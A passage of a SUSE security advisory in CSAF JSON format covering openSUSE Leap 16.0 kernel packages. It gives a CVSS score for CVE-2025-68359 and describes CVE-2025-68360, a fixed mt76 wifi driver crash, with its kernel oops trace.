"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68359"
},
{
"cve": "CVE-2025-68360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks\n\nMT7996 driver can use both wed and wed_hif2 devices to offload traffic\nfrom/to the wireless NIC. In the current codebase we assume to always\nuse the primary wed device in wed callbacks resulting in the following\ncrash if the hw runs wed_hif2 (e.g. 6GHz link).\n\n[ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a\n[ 297.464928] Mem abort info:\n[ 297.467722] ESR = 0x0000000096000005\n[ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 297.476766] SET = 0, FnV = 0\n[ 297.479809] EA = 0, S1PTW = 0\n[ 297.482940] FSC = 0x05: level 1 translation fault\n[ 297.487809] Data abort info:\n[ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000\n[ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, pmd=0000000000000000\n[ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP\n[ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0\n[ 297.723908] Tainted: [O]=OOT_MODULE\n[ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT)\n[ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table]\n[ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80\n[ 297.757126] sp : ffffffc080fe3ae0\n[ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7\n[ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00\n[ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018\n[ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000\n[ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000\n[ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da\n[ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200\n[ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002\n[ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000\n[ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8\n[ 297.831686] Call trace:\n[ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.839254] mtk_wed_flow_remove+0x58/0x80\n[ 297.843342] mtk_flow_offload_cmd+0x434/0x574\n[ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40\n[ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table]\n[ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table]\n[ 297.864463] process_one_work+0x174/0x300\n[ 297.868465] worker_thread+0x278/0x430\n[ 297.872204] kthread+0xd8/0xdc\n[ 297.875251] ret_from_fork+0x10/0x20\n[ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421)\n[ 297.884901] ---[ end trace 0000000000000000 ]---\n\nFix the issue detecting the proper wed reference to use running wed\ncallabacks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
